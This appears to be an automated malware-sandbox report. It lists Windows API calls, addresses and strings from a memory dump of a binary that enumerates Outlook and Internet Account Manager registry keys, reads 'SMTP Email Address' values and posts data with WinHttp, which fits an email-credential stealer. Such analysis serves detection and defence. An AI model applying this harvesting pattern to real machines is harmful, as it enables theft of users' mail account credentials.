                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047935B,00000000), ref: 004342AF
                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?,?,?,?,0047935B,00000000), ref: 00434320
                                                                                                    • _strlen.LIBCMT ref: 0043434D
                                                                                                    • _strlen.LIBCMT ref: 00434357
                                                                                                    • WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047935B,00000000), ref: 0043436D
                                                                                                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047935B,00000000), ref: 0043437E
                                                                                                    • WinHttpQueryDataAvailable.WINHTTP(00000000,00000000,?,?,?,0047935B,00000000), ref: 00434395
                                                                                                    • WinHttpReadData.WINHTTP(00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047935B,00000000), ref: 004343C0
                                                                                                    • GetLastError.KERNEL32(?,?,?,0047935B,00000000), ref: 00434478
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047935B,00000000), ref: 00434482
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047935B,00000000), ref: 00434489
                                                                                                    • WinHttpCloseHandle.WINHTTP(?,?,?,?,0047935B,00000000), ref: 00434493
                                                                                                    Strings
                                                                                                    • Content-Type: text/plain; charset=UTF-8, xrefs: 00434367
                                                                                                    • %99[^:]://%99[^/]%99[^], xrefs: 00434127
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableErrorH_prologLastQueryReadReceiveResponseSend
                                                                                                    • String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 004349A2: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 004349E3
                                                                                                      • Part of subcall function 004349A2: GetProcAddress.KERNEL32(00000000,?), ref: 00434A20
                                                                                                      • Part of subcall function 004349A2: FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 00434A54
                                                                                                      • Part of subcall function 00434E00: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E25
                                                                                                      • Part of subcall function 00434E00: RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00435370,00000001), ref: 00434EB6
                                                                                                      • Part of subcall function 00434E00: RegCloseKey.ADVAPI32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434EC3
                                                                                                      • Part of subcall function 00434ECD: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434EF4
                                                                                                      • Part of subcall function 00434ECD: RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434F1F
                                                                                                      • Part of subcall function 00434ECD: lstrlenW.KERNEL32(0043549A,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F36
                                                                                                      • Part of subcall function 00434ECD: lstrlenW.KERNEL32(?,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F43
                                                                                                      • Part of subcall function 00434ECD: lstrcpyW.KERNEL32 ref: 00434F64
                                                                                                      • Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434F70
                                                                                                      • Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,?), ref: 00434F7E
                                                                                                      • Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,?), ref: 00434F8A
                                                                                                      • Part of subcall function 00434ECD: RegEnumKeyExW.ADVAPI32(0043549A,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434FC4
                                                                                                      • Part of subcall function 00434ECD: RegCloseKey.ADVAPI32(0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434FD9
                                                                                                      • Part of subcall function 0043592B: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
                                                                                                      • Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
                                                                                                      • Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
                                                                                                      • Part of subcall function 0043592B: RegCloseKey.ADVAPI32(00000100), ref: 004359EE
                                                                                                    • lstrlenW.KERNEL32(00000000,?,?,?,0043549A), ref: 004353A8
                                                                                                    • lstrcpyW.KERNEL32 ref: 004353C0
                                                                                                    • lstrcpyW.KERNEL32 ref: 004353CC
                                                                                                      • Part of subcall function 00434E00: lstrlenW.KERNEL32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E4B
                                                                                                      • Part of subcall function 00434E00: lstrcpyW.KERNEL32 ref: 00434E68
                                                                                                      • Part of subcall function 00434E00: lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434E74
                                                                                                      • Part of subcall function 00434E00: lstrcatW.KERNEL32(00000000,?), ref: 00434E82
                                                                                                      • Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 004353FF
                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 00435442
                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 004353ED
                                                                                                    • Software\Microsoft\Internet Account Manager, xrefs: 0043538E
                                                                                                    • \Accounts, xrefs: 004353C6
                                                                                                    • Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 0043545E
                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00435364
                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 0043540A
                                                                                                    • Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 00435434
                                                                                                    • Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 00435472
                                                                                                    • Outlook, xrefs: 00435389
                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 00435450
                                                                                                    • \Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00435370
                                                                                                    • Identities, xrefs: 0043537A
                                                                                                    • Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 00435426
                                                                                                    • Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 00435418
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
                                                                                                    • String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts$\Software\Microsoft\Internet Account Manager\Accounts
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 00463EA7: CreateFileW.KERNEL32(00000000,00000000,?,00464297,?,?,00000000,?,00464297,00000000,0000000C), ref: 00463EC4
                                                                                                    • GetLastError.KERNEL32 ref: 00464302
                                                                                                    • __dosmaperr.LIBCMT ref: 00464309
                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00464315
                                                                                                    • GetLastError.KERNEL32 ref: 0046431F
                                                                                                    • __dosmaperr.LIBCMT ref: 00464328
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00464348
                                                                                                    • CloseHandle.KERNEL32(0045A93D), ref: 00464495
                                                                                                    • GetLastError.KERNEL32 ref: 004644C7
                                                                                                    • __dosmaperr.LIBCMT ref: 004644CE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _strcat.LIBCMT ref: 004203EC
                                                                                                    • wsprintfA.USER32 ref: 00420446
                                                                                                    • wsprintfA.USER32 ref: 00420467
                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 00420496
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00420508
                                                                                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 00420542
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00420552
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$wsprintf$CloseCreateHandleTimeWrite_strcat
                                                                                                    • String ID: %s%s$%s%s%s$:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
                                                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
                                                                                                    • GetLastError.KERNEL32 ref: 00438E3A
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
                                                                                                    • GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
                                                                                                    • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
                                                                                                    • GlobalFree.KERNEL32 ref: 00438E92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
                                                                                                    • String ID: S-1-5-18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434EF4
                                                                                                    • RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434F1F
                                                                                                    • lstrlenW.KERNEL32(0043549A,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F36
                                                                                                    • lstrlenW.KERNEL32(?,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F43
                                                                                                    • lstrcpyW.KERNEL32 ref: 00434F64
                                                                                                    • lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434F70
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 00434F7E
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 00434F8A
                                                                                                    • RegEnumKeyExW.ADVAPI32(0043549A,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434FC4
                                                                                                    • RegCloseKey.ADVAPI32(0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434FD9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrcat$Enumlstrlen$CloseOpenlstrcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3646165539-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00416EB2
                                                                                                      • Part of subcall function 0040AF03: __EH_prolog.LIBCMT ref: 0040AF08
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$Deallocate
                                                                                                    • String ID: .*-$$7>/($E@U$Y$]s9<)$i`qv
                                                                                                    • API String ID: 2428181759-1285848389
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 00457596: GetConsoleCP.KERNEL32(00000005,~eD,00000000), ref: 004575DE
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,00445098,00000000,00421A56,~eD,~eD,00000010,00445098,00000000,00000005,00421A56,00421A56,?), ref: 00457F52
                                                                                                    • GetLastError.KERNEL32(?,0044657E), ref: 00457F5C
                                                                                                    • __dosmaperr.LIBCMT ref: 00457FA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                                                                    • String ID: ~eD$~eD$~eD
                                                                                                    • API String ID: 251514795-1598461380
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00438AD9
                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,755524D0,00000000,00000008), ref: 00438B5B
                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000040), ref: 00438BA8
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00438BC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseH_prologOpenQueryValue
                                                                                                    • String ID: $iEGLMJAcQM@$@
                                                                                                    • API String ID: 1233982722-1058998065
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E25
                                                                                                    • lstrlenW.KERNEL32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E4B
                                                                                                    • lstrcpyW.KERNEL32 ref: 00434E68
                                                                                                    • lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434E74
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 00434E82
                                                                                                    • RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00435370,00000001), ref: 00434EB6
                                                                                                    • RegCloseKey.ADVAPI32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434EC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrcat$CloseEnumOpenlstrcpylstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2943937744-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
                                                                                                    • RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
                                                                                                    • RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
                                                                                                    • RegCloseKey.ADVAPI32(00000100), ref: 004359EE
                                                                                                      • Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$CloseOpen_free
                                                                                                    • String ID: SMTP Email Address
                                                                                                    • API String ID: 3744367872-3214364705
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00439095
                                                                                                    • CreateProcessA.KERNEL32 ref: 0043911E
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00439127
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00439130
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$CreateFileModuleNameProcess
                                                                                                    • String ID: N
                                                                                                    • API String ID: 2820832629-1130791706
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 0042027F
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0042028D
                                                                                                    • _strcat.LIBCMT ref: 004202F3
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 00420310
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00420324
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AttributesCreateDirectoryFile$_strcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 2481838186-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040947D
                                                                                                      • Part of subcall function 0043F433: FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043F449
                                                                                                    • LocalFree.KERNEL32(0000000F,unknown error,0000000D), ref: 004094C3
                                                                                                    • LocalFree.KERNEL32(?), ref: 004094DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLocal$FormatH_prologMessage
                                                                                                    • String ID: unknown error
                                                                                                    • API String ID: 252809769-3078798498
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00488780,00000000,?,?,004207F8,00000000,?,00000000), ref: 0040B80A
                                                                                                    • CreateDirectoryTransactedA.KERNEL32 ref: 0040B823
                                                                                                    • CommitTransaction.KTMW32(00000000,?,004207F8,00000000,?,00000000,00000000), ref: 0040B82E
                                                                                                    • RollbackTransaction.KTMW32(00000000,?,004207F8,00000000,?,00000000,00000000), ref: 0040B836
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Transaction$Create$CommitDirectoryRollbackTransacted
                                                                                                    • String ID:
                                                                                                    • API String ID: 629542334-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 0042C008
                                                                                                    • RemoveDirectoryTransactedA.KERNEL32 ref: 0042C01F
                                                                                                    • CommitTransaction.KTMW32(00000000,?,00000000), ref: 0042C02A
                                                                                                    • RollbackTransaction.KTMW32(00000000,?,00000000), ref: 0042C032
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Transaction$CommitCreateDirectoryRemoveRollbackTransacted
                                                                                                    • String ID:
                                                                                                    • API String ID: 1201024725-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00000000,00000000,?,004209C9,00000000), ref: 0040B7BA
                                                                                                    • DeleteFileTransactedA.KERNEL32 ref: 0040B7D1
                                                                                                    • CommitTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7DC
                                                                                                    • RollbackTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Transaction$CommitCreateDeleteFileRollbackTransacted
                                                                                                    • String ID:
                                                                                                    • API String ID: 3802493581-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00020008,?), ref: 00435BC4
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00435BCB
                                                                                                    • GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 00435BDD
                                                                                                    • CloseHandle.KERNEL32(?,?,00000200), ref: 00435BEA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseCurrentDirectoryHandleOpenProfileTokenUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 1246687928-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000005,~eD,00000000,?,00457F36,00000010,~eD,00000000,?,00421A56,~eD), ref: 00457AB5
                                                                                                    • GetLastError.KERNEL32(?,00457F36,00000010,~eD,00000000,?,00421A56,~eD,~eD,00000010,00445098,00000000,00000005,00421A56,00421A56,?), ref: 00457ADB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID: ~eD
                                                                                                    • API String ID: 442123175-3356853795
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • OpenMutexA.KERNEL32 ref: 00436130
                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0043613D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Mutex$CreateOpen
                                                                                                    • String ID: ENXX
                                                                                                    • API String ID: 4030545807-3763919171
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID: 0xn
                                                                                                    • API String ID: 269201875-2529592099
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 004349E3
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00434A20
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 00434A54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 145871493-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040A9E1
                                                                                                    • ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040AA4C
                                                                                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040AA60
                                                                                                      • Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFindH_prologNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
                                                                                                    • String ID:
                                                                                                    • API String ID: 3696715561-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0046061E
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0046068C
                                                                                                      • Part of subcall function 0045AB92: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0045CBC8,?,00000000,00000000), ref: 0045AC34
                                                                                                      • Part of subcall function 0045918E: RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0
                                                                                                    • _free.LIBCMT ref: 0046067D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2560199156-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000244,?,?,0041FD07,00000140,?,?,00000000), ref: 0041EF66
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,00000000,?,0041FD07,00000140,?,?,00000000,?,004205B0), ref: 0041EF87
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,0041FD07,00000140,?,?,00000000,?,004205B0,?,?,00000244,00488780), ref: 0041EFC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Pointer$Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 250661774-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateFileMappingA.KERNEL32 ref: 0043DC15
                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,4876E7FF,?,?,00004098,75146490,00000000,?,0043EB85,?,?,0042CEB9), ref: 0043DC32
                                                                                                    • CloseHandle.KERNEL32(?,?,?,00004098,75146490,00000000,?,0043EB85,?,?,0042CEB9), ref: 0043DC42
                                                                                                    Memory Dump Source
